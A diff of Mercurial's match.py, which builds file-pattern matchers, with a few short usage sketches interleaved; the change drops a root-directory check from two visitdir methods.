125 125 r"""build an object to match a set of file patterns
126 126
127 127 arguments:
128 128 root - the canonical root of the tree you're matching against
129 129 cwd - the current working directory, if relevant
130 130 patterns - patterns to find
131 131 include - patterns to include (unless they are excluded)
132 132 exclude - patterns to exclude (even if they are included)
133 133 default - if a pattern in patterns has no explicit type, assume this one
134 134 auditor - optional path auditor
135 135 ctx - optional changecontext
136 136 listsubrepos - if True, recurse into subrepositories
137 137 warn - optional function used for printing warnings
138 138 badfn - optional bad() callback for this matcher instead of the default
139 139 icasefs - make a matcher for wdir on case insensitive filesystems, which
140 140 normalizes the given patterns to the case in the filesystem
141 141
142 142 a pattern is one of:
143 143 'glob:<glob>' - a glob relative to cwd
144 144 're:<regexp>' - a regular expression
145 145 'path:<path>' - a path relative to repository root, which is matched
146 146 recursively
147 147 'rootfilesin:<path>' - a path relative to repository root, which is
148 148 matched non-recursively (will not match subdirectories)
149 149 'relglob:<glob>' - an unrooted glob (*.c matches C files in all dirs)
150 150 'relpath:<path>' - a path relative to cwd
151 151 'relre:<regexp>' - a regexp that needn't match the start of a name
152 152 'set:<fileset>' - a fileset expression
153 153 'include:<path>' - a file of patterns to read and include
154 154 'subinclude:<path>' - a file of patterns to match against files under
155 155 the same directory
156 156 '<something>' - a pattern of the specified default type
157 157
158 158 Usually a patternmatcher is returned:
159 159 >>> match(b'foo', b'.', [b're:.*\.c$', b'path:foo/a', b'*.py'])
160 160 <patternmatcher patterns='.*\\.c$|foo/a(?:/|$)|[^/]*\\.py$'>
161 161
162 162 Combining 'patterns' with 'include' (resp. 'exclude') gives an
163 163 intersectionmatcher (resp. a differencematcher):
164 164 >>> type(match(b'foo', b'.', [b're:.*\.c$'], include=[b'path:lib']))
165 165 <class 'mercurial.match.intersectionmatcher'>
166 166 >>> type(match(b'foo', b'.', [b're:.*\.c$'], exclude=[b'path:build']))
167 167 <class 'mercurial.match.differencematcher'>
168 168
169 169 Notice that, if 'patterns' is empty, an alwaysmatcher is returned:
170 170 >>> match(b'foo', b'.', [])
171 171 <alwaysmatcher>
172 172
173 173 The 'default' argument determines which kind of pattern is assumed if a
174 174 pattern has no prefix:
175 175 >>> match(b'foo', b'.', [b'.*\.c$'], default=b're')
176 176 <patternmatcher patterns='.*\\.c$'>
177 177 >>> match(b'foo', b'.', [b'main.py'], default=b'relpath')
178 178 <patternmatcher patterns='main\\.py(?:/|$)'>
179 179 >>> match(b'foo', b'.', [b'main.py'], default=b're')
180 180 <patternmatcher patterns='main.py'>
181 181
182 182 The primary use of matchers is to check whether a value (usually a file
183 183 name) matches against one of the patterns given at initialization. There
184 184 are two ways of doing this check.
185 185
186 186 >>> m = match(b'foo', b'', [b're:.*\.c$', b'relpath:a'])
187 187
188 188 1. Calling the matcher with a file name returns True if any pattern
189 189 matches that file name:
190 190 >>> m(b'a')
191 191 True
192 192 >>> m(b'main.c')
193 193 True
194 194 >>> m(b'test.py')
195 195 False
196 196
197 197 2. Using the exact() method only returns True if the file name matches one
198 198 of the exact patterns (i.e. not re: or glob: patterns):
199 199 >>> m.exact(b'a')
200 200 True
201 201 >>> m.exact(b'main.c')
202 202 False
203 203 """
204 204 normalize = _donormalize
205 205 if icasefs:
206 206 dirstate = ctx.repo().dirstate
207 207 dsnormalize = dirstate.normalize
208 208
209 209 def normalize(patterns, default, root, cwd, auditor, warn):
210 210 kp = _donormalize(patterns, default, root, cwd, auditor, warn)
211 211 kindpats = []
212 212 for kind, pats, source in kp:
213 213 if kind not in ('re', 'relre'): # regex can't be normalized
214 214 p = pats
215 215 pats = dsnormalize(pats)
216 216
217 217 # Preserve the original to handle a case-only rename.
218 218 if p != pats and p in dirstate:
219 219 kindpats.append((kind, p, source))
220 220
221 221 kindpats.append((kind, pats, source))
222 222 return kindpats
223 223
224 224 if patterns:
225 225 kindpats = normalize(patterns, default, root, cwd, auditor, warn)
226 226 if _kindpatsalwaysmatch(kindpats):
227 227 m = alwaysmatcher(badfn)
228 228 else:
229 229 m = _buildkindpatsmatcher(patternmatcher, root, kindpats, ctx=ctx,
230 230 listsubrepos=listsubrepos, badfn=badfn)
231 231 else:
232 232 # It's a little strange that passing no patterns means matching everything.
233 233 # Consider changing this to match nothing (probably using nevermatcher).
234 234 m = alwaysmatcher(badfn)
235 235
236 236 if include:
237 237 kindpats = normalize(include, 'glob', root, cwd, auditor, warn)
238 238 im = _buildkindpatsmatcher(includematcher, root, kindpats, ctx=ctx,
239 239 listsubrepos=listsubrepos, badfn=None)
240 240 m = intersectmatchers(m, im)
241 241 if exclude:
242 242 kindpats = normalize(exclude, 'glob', root, cwd, auditor, warn)
243 243 em = _buildkindpatsmatcher(includematcher, root, kindpats, ctx=ctx,
244 244 listsubrepos=listsubrepos, badfn=None)
245 245 m = differencematcher(m, em)
246 246 return m
247 247
248 248 def exact(files, badfn=None):
249 249 return exactmatcher(files, badfn=badfn)
250 250
251 251 def always(badfn=None):
252 252 return alwaysmatcher(badfn)
253 253
254 254 def never(badfn=None):
255 255 return nevermatcher(badfn)
256 256
257 257 def badmatch(match, badfn):
258 258 """Make a copy of the given matcher, replacing its bad method with the given
259 259 one.
260 260 """
261 261 m = copy.copy(match)
262 262 m.bad = badfn
263 263 return m
264 264
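A minimal usage sketch (the 'missing' list and the lambda are illustrative, not part of this module):

    missing = []
    m = badmatch(match(root, b'', [b'path:foo']), lambda f, msg: missing.append(f))
    # dirstate.walk(m, ...) now records unreachable explicit files in 'missing'
    # instead of reporting them through the original bad() callback.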
265 265 def _donormalize(patterns, default, root, cwd, auditor=None, warn=None):
266 266 '''Convert 'kind:pat' from the patterns list to tuples with kind and
267 267 normalized and rooted patterns and with listfiles expanded.'''
268 268 kindpats = []
269 269 for kind, pat in [_patsplit(p, default) for p in patterns]:
270 270 if kind in cwdrelativepatternkinds:
271 271 pat = pathutil.canonpath(root, cwd, pat, auditor=auditor)
272 272 elif kind in ('relglob', 'path', 'rootfilesin', 'rootglob'):
273 273 pat = util.normpath(pat)
274 274 elif kind in ('listfile', 'listfile0'):
275 275 try:
276 276 files = util.readfile(pat)
277 277 if kind == 'listfile0':
278 278 files = files.split('\0')
279 279 else:
280 280 files = files.splitlines()
281 281 files = [f for f in files if f]
282 282 except EnvironmentError:
283 283 raise error.Abort(_("unable to read file list (%s)") % pat)
284 284 for k, p, source in _donormalize(files, default, root, cwd,
285 285 auditor, warn):
286 286 kindpats.append((k, p, pat))
287 287 continue
288 288 elif kind == 'include':
289 289 try:
290 290 fullpath = os.path.join(root, util.localpath(pat))
291 291 includepats = readpatternfile(fullpath, warn)
292 292 for k, p, source in _donormalize(includepats, default,
293 293 root, cwd, auditor, warn):
294 294 kindpats.append((k, p, source or pat))
295 295 except error.Abort as inst:
296 296 raise error.Abort('%s: %s' % (pat, inst[0]))
297 297 except IOError as inst:
298 298 if warn:
299 299 warn(_("skipping unreadable pattern file '%s': %s\n") %
300 300 (pat, stringutil.forcebytestr(inst.strerror)))
301 301 continue
302 302 # else: re or relre - which cannot be normalized
303 303 kindpats.append((kind, pat, ''))
304 304 return kindpats
305 305
306 306 class basematcher(object):
307 307
308 308 def __init__(self, badfn=None):
309 309 if badfn is not None:
310 310 self.bad = badfn
311 311
312 312 def __call__(self, fn):
313 313 return self.matchfn(fn)
314 314 # Callbacks related to how the matcher is used by dirstate.walk.
315 315 # Subscribers to these events must monkeypatch the matcher object.
316 316 def bad(self, f, msg):
317 317 '''Callback from dirstate.walk for each explicit file that can't be
318 318 found/accessed, with an error message.'''
319 319
320 320 # If an explicitdir is set, it will be called when an explicitly listed
321 321 # directory is visited.
322 322 explicitdir = None
323 323
324 324 # If a traversedir is set, it will be called when a directory discovered
325 325 # by recursive traversal is visited.
326 326 traversedir = None
327 327
328 328 @propertycache
329 329 def _files(self):
330 330 return []
331 331
332 332 def files(self):
333 333 '''Explicitly listed files or patterns or roots:
334 334 if no patterns or .always(): empty list,
335 335 if exact: list exact files,
336 336 if not .anypats(): list all files and dirs,
337 337 else: optimal roots'''
338 338 return self._files
339 339
340 340 @propertycache
341 341 def _fileset(self):
342 342 return set(self._files)
343 343
344 344 def exact(self, f):
345 345 '''Returns True if f is in .files().'''
346 346 return f in self._fileset
347 347
348 348 def matchfn(self, f):
349 349 return False
350 350
351 351 def visitdir(self, dir):
352 352 '''Decides whether a directory should be visited based on whether it
353 353 has potential matches in it or one of its subdirectories. This is
354 354 based on the match's primary, included, and excluded patterns.
355 355
356 356 Returns the string 'all' if the given directory and all subdirectories
357 357 should be visited. Otherwise returns True or False indicating whether
358 358 the given directory should be visited.
359 359 '''
360 360 return True
361 361
362 362 def visitchildrenset(self, dir):
363 363 '''Decides whether a directory should be visited based on whether it
364 364 has potential matches in it or one of its subdirectories, and
365 365 potentially lists which subdirectories of that directory should be
366 366 visited. This is based on the match's primary, included, and excluded
367 367 patterns.
368 368
369 369 This function is very similar to 'visitdir', and the following mapping
370 370 can be applied:
371 371
372 372 visitdir | visitchildrenset
373 373 ----------+-------------------
374 374 False | set()
375 375 'all' | 'all'
376 376 True | 'this' OR non-empty set of subdirs -or files- to visit
377 377
378 378 Example:
379 379 Assume matchers ['path:foo/bar', 'rootfilesin:qux'], we would return
380 380 the following values (assuming the implementation of visitchildrenset
381 381 is capable of recognizing this; some implementations are not).
382 382
383 383 '' -> {'foo', 'qux'}
384 384 'baz' -> set()
385 385 'foo' -> {'bar'}
386 386 # Ideally this would be 'all', but since the prefix nature of matchers
387 387 # is applied to the entire matcher, we have to downgrade this to
388 388 # 'this' due to the non-prefix 'rootfilesin'-kind matcher being mixed
389 389 # in.
390 390 'foo/bar' -> 'this'
391 391 'qux' -> 'this'
392 392
393 393 Important:
394 394 Most matchers do not know if they're representing files or
395 395 directories. They see ['path:dir/f'] and don't know whether 'f' is a
396 396 file or a directory, so visitchildrenset('dir') for most matchers will
397 397 return {'f'}, but if the matcher knows it's a file (like exactmatcher
398 398 does), it may return 'this'. Do not rely on a set return value
399 399 indicating that there are no files in this dir to investigate (or,
400 400 equivalently, that 'this' is always returned when there are files
401 401 in 'dir' to investigate).
402 402 '''
403 403 return 'this'
404 404
405 405 def always(self):
406 406 '''Matcher will match everything and .files() will be empty --
407 407 optimization might be possible.'''
408 408 return False
409 409
410 410 def isexact(self):
411 411 '''Matcher will match exactly the list of files in .files() --
412 412 optimization might be possible.'''
413 413 return False
414 414
415 415 def prefix(self):
416 416 '''Matcher will match the paths in .files() recursively --
417 417 optimization might be possible.'''
418 418 return False
419 419
420 420 def anypats(self):
421 421 '''None of .always(), .isexact(), and .prefix() is true --
422 422 optimizations will be difficult.'''
423 423 return not self.always() and not self.isexact() and not self.prefix()
424 424
425 425 class alwaysmatcher(basematcher):
426 426 '''Matches everything.'''
427 427
428 428 def __init__(self, badfn=None):
429 429 super(alwaysmatcher, self).__init__(badfn)
430 430
431 431 def always(self):
432 432 return True
433 433
434 434 def matchfn(self, f):
435 435 return True
436 436
437 437 def visitdir(self, dir):
438 438 return 'all'
439 439
440 440 def visitchildrenset(self, dir):
441 441 return 'all'
442 442
443 443 def __repr__(self):
444 444 return r'<alwaysmatcher>'
445 445
446 446 class nevermatcher(basematcher):
447 447 '''Matches nothing.'''
448 448
449 449 def __init__(self, badfn=None):
450 450 super(nevermatcher, self).__init__(badfn)
451 451
452 452 # It's a little weird to say that the nevermatcher is an exact matcher
453 453 # or a prefix matcher, but it seems to make sense to let callers take
454 454 # fast paths based on either. There will be no exact matches, nor any
455 455 # prefixes (files() returns []), so fast paths iterating over them should
456 456 # be efficient (and correct).
457 457 def isexact(self):
458 458 return True
459 459
460 460 def prefix(self):
461 461 return True
462 462
463 463 def visitdir(self, dir):
464 464 return False
465 465
466 466 def visitchildrenset(self, dir):
467 467 return set()
468 468
469 469 def __repr__(self):
470 470 return r'<nevermatcher>'
471 471
472 472 class predicatematcher(basematcher):
473 473 """A matcher adapter for a simple boolean function"""
474 474
475 475 def __init__(self, predfn, predrepr=None, badfn=None):
476 476 super(predicatematcher, self).__init__(badfn)
477 477 self.matchfn = predfn
478 478 self._predrepr = predrepr
479 479
480 480 @encoding.strmethod
481 481 def __repr__(self):
482 482 s = (stringutil.buildrepr(self._predrepr)
483 483 or pycompat.byterepr(self.matchfn))
484 484 return '<predicatenmatcher pred=%s>' % s
485 485
486 486 def normalizerootdir(dir, funcname):
487 487 if dir == '.':
488 488 util.nouideprecwarn("match.%s() no longer accepts "
489 489 "'.', use '' instead." % funcname, '5.1')
490 490 return ''
491 491 return dir
492 492
493 493
494 494 class patternmatcher(basematcher):
495 495 """Matches a set of (kind, pat, source) against a 'root' directory.
496 496
497 497 >>> kindpats = [
498 498 ... (b're', br'.*\.c$', b''),
499 499 ... (b'path', b'foo/a', b''),
500 500 ... (b'relpath', b'b', b''),
501 501 ... (b'glob', b'*.h', b''),
502 502 ... ]
503 503 >>> m = patternmatcher(b'foo', kindpats)
504 504 >>> m(b'main.c') # matches re:.*\.c$
505 505 True
506 506 >>> m(b'b.txt')
507 507 False
508 508 >>> m(b'foo/a') # matches path:foo/a
509 509 True
510 510 >>> m(b'a') # does not match path:b, since 'root' is 'foo'
511 511 False
512 512 >>> m(b'b') # matches relpath:b, since 'root' is 'foo'
513 513 True
514 514 >>> m(b'lib.h') # matches glob:*.h
515 515 True
516 516
517 517 >>> m.files()
518 518 ['', 'foo/a', 'b', '']
519 519 >>> m.exact(b'foo/a')
520 520 True
521 521 >>> m.exact(b'b')
522 522 True
523 523 >>> m.exact(b'lib.h') # exact matches are for (rel)path kinds
524 524 False
525 525 """
526 526
527 527 def __init__(self, root, kindpats, badfn=None):
528 528 super(patternmatcher, self).__init__(badfn)
529 529
530 530 self._files = _explicitfiles(kindpats)
531 531 self._prefix = _prefix(kindpats)
532 532 self._pats, self.matchfn = _buildmatch(kindpats, '$', root)
533 533
534 534 @propertycache
535 535 def _dirs(self):
536 536 return set(util.dirs(self._fileset)) | {''}
537 537
538 538 def visitdir(self, dir):
539 539 dir = normalizerootdir(dir, 'visitdir')
540 540 if self._prefix and dir in self._fileset:
541 541 return 'all'
542 return ('' in self._fileset or
543 dir in self._fileset or
542 return (dir in self._fileset or
544 543 dir in self._dirs or
545 544 any(parentdir in self._fileset
546 545 for parentdir in util.finddirs(dir)))
547 546
548 547 def visitchildrenset(self, dir):
549 548 ret = self.visitdir(dir)
550 549 if ret is True:
551 550 return 'this'
552 551 elif not ret:
553 552 return set()
554 553 assert ret == 'all'
555 554 return 'all'
556 555
557 556 def prefix(self):
558 557 return self._prefix
559 558
560 559 @encoding.strmethod
561 560 def __repr__(self):
562 561 return ('<patternmatcher patterns=%r>' % pycompat.bytestr(self._pats))
563 562
564 563 # This is basically a reimplementation of util.dirs that stores the children
565 564 # instead of just a count of them, plus a small optional optimization to avoid
566 565 # some directories we don't need.
567 566 class _dirchildren(object):
568 567 def __init__(self, paths, onlyinclude=None):
569 568 self._dirs = {}
570 569 self._onlyinclude = onlyinclude or []
571 570 addpath = self.addpath
572 571 for f in paths:
573 572 addpath(f)
574 573
575 574 def addpath(self, path):
576 575 if path == '':
577 576 return
578 577 dirs = self._dirs
579 578 findsplitdirs = _dirchildren._findsplitdirs
580 579 for d, b in findsplitdirs(path):
581 580 if d not in self._onlyinclude:
582 581 continue
583 582 dirs.setdefault(d, set()).add(b)
584 583
585 584 @staticmethod
586 585 def _findsplitdirs(path):
587 586 # yields (dirname, basename) tuples, walking back to the root. This is
588 587 # very similar to util.finddirs, except:
589 588 # - produces a (dirname, basename) tuple, not just 'dirname'
590 589 # - includes root dir
591 590 # Unlike manifest._splittopdir, this does not suffix `dirname` with a
592 591 # slash.
593 592 oldpos = len(path)
594 593 pos = path.rfind('/')
595 594 while pos != -1:
596 595 yield path[:pos], path[pos + 1:oldpos]
597 596 oldpos = pos
598 597 pos = path.rfind('/', 0, pos)
599 598 yield '', path[:oldpos]
600 599
601 600 def get(self, path):
602 601 return self._dirs.get(path, set())
603 602
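For example, a doctest-style sketch of how _findsplitdirs walks a path back to the root and how onlyinclude prunes what gets stored (values computed from the code above):

    >>> list(_dirchildren._findsplitdirs(b'foo/bar/baz.txt'))
    [('foo/bar', 'baz.txt'), ('foo', 'bar'), ('', 'foo')]
    >>> sorted(_dirchildren([b'foo/bar/baz.txt'], onlyinclude=[b'foo']).get(b'foo'))
    ['bar']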
604 603 class includematcher(basematcher):
605 604
606 605 def __init__(self, root, kindpats, badfn=None):
607 606 super(includematcher, self).__init__(badfn)
608 607
609 608 self._pats, self.matchfn = _buildmatch(kindpats, '(?:/|$)', root)
610 609 self._prefix = _prefix(kindpats)
611 610 roots, dirs, parents = _rootsdirsandparents(kindpats)
612 611 # roots are directories which are recursively included.
613 612 self._roots = set(roots)
614 613 # dirs are directories which are non-recursively included.
615 614 self._dirs = set(dirs)
616 615 # parents are directories which are non-recursively included because
617 616 # they are needed to get to items in _dirs or _roots.
618 617 self._parents = set(parents)
619 618
620 619 def visitdir(self, dir):
621 620 dir = normalizerootdir(dir, 'visitdir')
622 621 if self._prefix and dir in self._roots:
623 622 return 'all'
624 return ('' in self._roots or
625 dir in self._roots or
623 return (dir in self._roots or
626 624 dir in self._dirs or
627 625 dir in self._parents or
628 626 any(parentdir in self._roots
629 627 for parentdir in util.finddirs(dir)))
630 628
631 629 @propertycache
632 630 def _allparentschildren(self):
633 631 # It may seem odd that we add dirs, roots, and parents, and then
634 632 # restrict to only parents. This is to catch the case of:
635 633 # dirs = ['foo/bar']
636 634 # parents = ['foo']
637 635 # if we asked for the children of 'foo', but had only added
638 636 # self._parents, we wouldn't be able to respond ['bar'].
639 637 return _dirchildren(
640 638 itertools.chain(self._dirs, self._roots, self._parents),
641 639 onlyinclude=self._parents)
642 640
643 641 def visitchildrenset(self, dir):
644 642 if self._prefix and dir in self._roots:
645 643 return 'all'
646 644 # Note: this does *not* include the 'dir in self._parents' case from
647 645 # visitdir, that's handled below.
648 646 if ('' in self._roots or
649 647 dir in self._roots or
650 648 dir in self._dirs or
651 649 any(parentdir in self._roots
652 650 for parentdir in util.finddirs(dir))):
653 651 return 'this'
654 652
655 653 if dir in self._parents:
656 654 return self._allparentschildren.get(dir) or set()
657 655 return set()
658 656
659 657 @encoding.strmethod
660 658 def __repr__(self):
661 659 return ('<includematcher includes=%r>' % pycompat.bytestr(self._pats))
662 660
663 661 class exactmatcher(basematcher):
664 662 r'''Matches the input files exactly. They are interpreted as paths, not
665 663 patterns (so no kind-prefixes).
666 664
667 665 >>> m = exactmatcher([b'a.txt', br're:.*\.c$'])
668 666 >>> m(b'a.txt')
669 667 True
670 668 >>> m(b'b.txt')
671 669 False
672 670
673 671 Input files that would be matched are exactly those returned by .files()
674 672 >>> m.files()
675 673 ['a.txt', 're:.*\\.c$']
676 674
677 675 So pattern 're:.*\.c$' is not considered as a regex, but as a file name
678 676 >>> m(b'main.c')
679 677 False
680 678 >>> m(br're:.*\.c$')
681 679 True
682 680 '''
683 681
684 682 def __init__(self, files, badfn=None):
685 683 super(exactmatcher, self).__init__(badfn)
686 684
687 685 if isinstance(files, list):
688 686 self._files = files
689 687 else:
690 688 self._files = list(files)
691 689
692 690 matchfn = basematcher.exact
693 691
694 692 @propertycache
695 693 def _dirs(self):
696 694 return set(util.dirs(self._fileset)) | {''}
697 695
698 696 def visitdir(self, dir):
699 697 dir = normalizerootdir(dir, 'visitdir')
700 698 return dir in self._dirs
701 699
702 700 def visitchildrenset(self, dir):
703 701 dir = normalizerootdir(dir, 'visitchildrenset')
704 702
705 703 if not self._fileset or dir not in self._dirs:
706 704 return set()
707 705
708 706 candidates = self._fileset | self._dirs - {''}
709 707 if dir != '':
710 708 d = dir + '/'
711 709 candidates = set(c[len(d):] for c in candidates if
712 710 c.startswith(d))
713 711 # self._dirs includes all of the directories, recursively, so if
714 712 # we're attempting to match foo/bar/baz.txt, it'll have '', 'foo',
715 713 # 'foo/bar' in it. Thus we can safely ignore a candidate that has a
716 714 # '/' in it, indicating it's for a subdir-of-a-subdir; the
717 715 # immediate subdir will be in there without a slash.
718 716 ret = {c for c in candidates if '/' not in c}
719 717 # We really do not expect ret to be empty, since that would imply that
720 718 # there's something in _dirs that didn't have a file in _fileset.
721 719 assert ret
722 720 return ret
723 721
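A doctest-style sketch (sorted() is used to make the set output stable):

    >>> em = exactmatcher([b'a/b.txt'])
    >>> sorted(em.visitchildrenset(b''))
    ['a']
    >>> sorted(em.visitchildrenset(b'a'))
    ['b.txt']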
724 722 def isexact(self):
725 723 return True
726 724
727 725 @encoding.strmethod
728 726 def __repr__(self):
729 727 return ('<exactmatcher files=%r>' % self._files)
730 728
731 729 class differencematcher(basematcher):
732 730 '''Composes two matchers by matching if the first matches and the second
733 731 does not.
734 732
735 733 The second matcher's non-matching-attributes (bad, explicitdir,
736 734 traversedir) are ignored.
737 735 '''
738 736 def __init__(self, m1, m2):
739 737 super(differencematcher, self).__init__()
740 738 self._m1 = m1
741 739 self._m2 = m2
742 740 self.bad = m1.bad
743 741 self.explicitdir = m1.explicitdir
744 742 self.traversedir = m1.traversedir
745 743
746 744 def matchfn(self, f):
747 745 return self._m1(f) and not self._m2(f)
748 746
749 747 @propertycache
750 748 def _files(self):
751 749 if self.isexact():
752 750 return [f for f in self._m1.files() if self(f)]
753 751 # If m1 is not an exact matcher, we can't easily figure out the set of
754 752 # files, because its files() are not always files. For example, if
755 753 # m1 is "path:dir" and m2 is "rootfilesin:.", we don't
756 754 # want to remove "dir" from the set even though it would match m2,
757 755 # because the "dir" in m1 may not be a file.
758 756 return self._m1.files()
759 757
760 758 def visitdir(self, dir):
761 759 if self._m2.visitdir(dir) == 'all':
762 760 return False
763 761 elif not self._m2.visitdir(dir):
764 762 # m2 does not match dir, we can return 'all' here if possible
765 763 return self._m1.visitdir(dir)
766 764 return bool(self._m1.visitdir(dir))
767 765
768 766 def visitchildrenset(self, dir):
769 767 m2_set = self._m2.visitchildrenset(dir)
770 768 if m2_set == 'all':
771 769 return set()
772 770 m1_set = self._m1.visitchildrenset(dir)
773 771 # Possible values for m1: 'all', 'this', set(...), set()
774 772 # Possible values for m2: 'this', set(...), set()
775 773 # If m2 has nothing under here that we care about, return m1, even if
776 774 # it's 'all'. This is a change in behavior from visitdir, which would
777 775 # return True, not 'all', for some reason.
778 776 if not m2_set:
779 777 return m1_set
780 778 if m1_set in ['all', 'this']:
781 779 # Never return 'all' here if m2_set is any kind of non-empty (either
782 780 # 'this' or set(foo)), since m2 might return set() for a
783 781 # subdirectory.
784 782 return 'this'
785 783 # Possible values for m1: set(...), set()
786 784 # Possible values for m2: 'this', set(...)
787 785 # We ignore m2's set results. They're possibly incorrect:
788 786 # m1 = path:dir/subdir, m2=rootfilesin:dir, visitchildrenset(''):
789 787 # m1 returns {'dir'}, m2 returns {'dir'}, if we subtracted we'd
790 788 # return set(), which is *not* correct, we still need to visit 'dir'!
791 789 return m1_set
792 790
793 791 def isexact(self):
794 792 return self._m1.isexact()
795 793
796 794 @encoding.strmethod
797 795 def __repr__(self):
798 796 return ('<differencematcher m1=%r, m2=%r>' % (self._m1, self._m2))
799 797
800 798 def intersectmatchers(m1, m2):
801 799 '''Composes two matchers by matching if both of them match.
802 800
803 801 The second matcher's non-matching-attributes (bad, explicitdir,
804 802 traversedir) are ignored.
805 803 '''
806 804 if m1 is None or m2 is None:
807 805 return m1 or m2
808 806 if m1.always():
809 807 m = copy.copy(m2)
810 808 # TODO: Consider encapsulating these things in a class so there's only
811 809 # one thing to copy from m1.
812 810 m.bad = m1.bad
813 811 m.explicitdir = m1.explicitdir
814 812 m.traversedir = m1.traversedir
815 813 return m
816 814 if m2.always():
817 815 m = copy.copy(m1)
818 816 return m
819 817 return intersectionmatcher(m1, m2)
820 818
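A usage sketch of the always() fast path (the root and pattern are illustrative):

    m1 = always()
    m2 = match(b'/repo', b'', [b'glob:*.py'])
    m = intersectmatchers(m1, m2)
    # m is a copy of m2 (no intersectionmatcher is built), but it reports
    # errors through m1's bad/explicitdir/traversedir callbacks.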
821 819 class intersectionmatcher(basematcher):
822 820 def __init__(self, m1, m2):
823 821 super(intersectionmatcher, self).__init__()
824 822 self._m1 = m1
825 823 self._m2 = m2
826 824 self.bad = m1.bad
827 825 self.explicitdir = m1.explicitdir
828 826 self.traversedir = m1.traversedir
829 827
830 828 @propertycache
831 829 def _files(self):
832 830 if self.isexact():
833 831 m1, m2 = self._m1, self._m2
834 832 if not m1.isexact():
835 833 m1, m2 = m2, m1
836 834 return [f for f in m1.files() if m2(f)]
837 835 # If neither m1 nor m2 is an exact matcher, we can't easily intersect
838 836 # the set of files, because their files() are not always files. For
839 837 # example, if intersecting a matcher "-I glob:foo.txt" with matcher of
840 838 # "path:dir2", we don't want to remove "dir2" from the set.
841 839 return self._m1.files() + self._m2.files()
842 840
843 841 def matchfn(self, f):
844 842 return self._m1(f) and self._m2(f)
845 843
846 844 def visitdir(self, dir):
847 845 visit1 = self._m1.visitdir(dir)
848 846 if visit1 == 'all':
849 847 return self._m2.visitdir(dir)
850 848 # bool() because visit1=True + visit2='all' should not be 'all'
851 849 return bool(visit1 and self._m2.visitdir(dir))
852 850
853 851 def visitchildrenset(self, dir):
854 852 m1_set = self._m1.visitchildrenset(dir)
855 853 if not m1_set:
856 854 return set()
857 855 m2_set = self._m2.visitchildrenset(dir)
858 856 if not m2_set:
859 857 return set()
860 858
861 859 if m1_set == 'all':
862 860 return m2_set
863 861 elif m2_set == 'all':
864 862 return m1_set
865 863
866 864 if m1_set == 'this' or m2_set == 'this':
867 865 return 'this'
868 866
869 867 assert isinstance(m1_set, set) and isinstance(m2_set, set)
870 868 return m1_set.intersection(m2_set)
871 869
872 870 def always(self):
873 871 return self._m1.always() and self._m2.always()
874 872
875 873 def isexact(self):
876 874 return self._m1.isexact() or self._m2.isexact()
877 875
878 876 @encoding.strmethod
879 877 def __repr__(self):
880 878 return ('<intersectionmatcher m1=%r, m2=%r>' % (self._m1, self._m2))
881 879
882 880 class subdirmatcher(basematcher):
883 881 """Adapt a matcher to work on a subdirectory only.
884 882
885 883 The paths are remapped to remove/insert the path as needed:
886 884
887 885 >>> from . import pycompat
888 886 >>> m1 = match(b'root', b'', [b'a.txt', b'sub/b.txt'])
889 887 >>> m2 = subdirmatcher(b'sub', m1)
890 888 >>> m2(b'a.txt')
891 889 False
892 890 >>> m2(b'b.txt')
893 891 True
894 892 >>> m2.matchfn(b'a.txt')
895 893 False
896 894 >>> m2.matchfn(b'b.txt')
897 895 True
898 896 >>> m2.files()
899 897 ['b.txt']
900 898 >>> m2.exact(b'b.txt')
901 899 True
902 900 >>> def bad(f, msg):
903 901 ... print(pycompat.sysstr(b"%s: %s" % (f, msg)))
904 902 >>> m1.bad = bad
905 903 >>> m2.bad(b'x.txt', b'No such file')
906 904 sub/x.txt: No such file
907 905 """
908 906
909 907 def __init__(self, path, matcher):
910 908 super(subdirmatcher, self).__init__()
911 909 self._path = path
912 910 self._matcher = matcher
913 911 self._always = matcher.always()
914 912
915 913 self._files = [f[len(path) + 1:] for f in matcher._files
916 914 if f.startswith(path + "/")]
917 915
918 916 # If the parent repo had a path to this subrepo and the matcher is
919 917 # a prefix matcher, this submatcher always matches.
920 918 if matcher.prefix():
921 919 self._always = any(f == path for f in matcher._files)
922 920
923 921 def bad(self, f, msg):
924 922 self._matcher.bad(self._path + "/" + f, msg)
925 923
926 924 def matchfn(self, f):
927 925 # Some information is lost in the superclass's constructor, so we
928 926 # cannot accurately create the matching function for the subdirectory
929 927 # from the inputs. Instead, we override matchfn() and visitdir() to
930 928 # call the original matcher with the subdirectory path prepended.
931 929 return self._matcher.matchfn(self._path + "/" + f)
932 930
933 931 def visitdir(self, dir):
934 932 dir = normalizerootdir(dir, 'visitdir')
935 933 if dir == '':
936 934 dir = self._path
937 935 else:
938 936 dir = self._path + "/" + dir
939 937 return self._matcher.visitdir(dir)
940 938
941 939 def visitchildrenset(self, dir):
942 940 dir = normalizerootdir(dir, 'visitchildrenset')
943 941 if dir == '':
944 942 dir = self._path
945 943 else:
946 944 dir = self._path + "/" + dir
947 945 return self._matcher.visitchildrenset(dir)
948 946
949 947 def always(self):
950 948 return self._always
951 949
952 950 def prefix(self):
953 951 return self._matcher.prefix() and not self._always
954 952
955 953 @encoding.strmethod
956 954 def __repr__(self):
957 955 return ('<subdirmatcher path=%r, matcher=%r>' %
958 956 (self._path, self._matcher))
959 957
960 958 class prefixdirmatcher(basematcher):
961 959 """Adapt a matcher to work on a parent directory.
962 960
963 961 The matcher's non-matching-attributes (bad, explicitdir, traversedir) are
964 962 ignored.
965 963
966 964 The prefix path should usually be the relative path from the root of
967 965 this matcher to the root of the wrapped matcher.
968 966
969 967 >>> m1 = match(util.localpath(b'root/d/e'), b'f', [b'../a.txt', b'b.txt'])
970 968 >>> m2 = prefixdirmatcher(b'd/e', m1)
971 969 >>> m2(b'a.txt')
972 970 False
973 971 >>> m2(b'd/e/a.txt')
974 972 True
975 973 >>> m2(b'd/e/b.txt')
976 974 False
977 975 >>> m2.files()
978 976 ['d/e/a.txt', 'd/e/f/b.txt']
979 977 >>> m2.exact(b'd/e/a.txt')
980 978 True
981 979 >>> m2.visitdir(b'd')
982 980 True
983 981 >>> m2.visitdir(b'd/e')
984 982 True
985 983 >>> m2.visitdir(b'd/e/f')
986 984 True
987 985 >>> m2.visitdir(b'd/e/g')
988 986 False
989 987 >>> m2.visitdir(b'd/ef')
990 988 False
991 989 """
992 990
993 991 def __init__(self, path, matcher, badfn=None):
994 992 super(prefixdirmatcher, self).__init__(badfn)
995 993 if not path:
996 994 raise error.ProgrammingError('prefix path must not be empty')
997 995 self._path = path
998 996 self._pathprefix = path + '/'
999 997 self._matcher = matcher
1000 998
1001 999 @propertycache
1002 1000 def _files(self):
1003 1001 return [self._pathprefix + f for f in self._matcher._files]
1004 1002
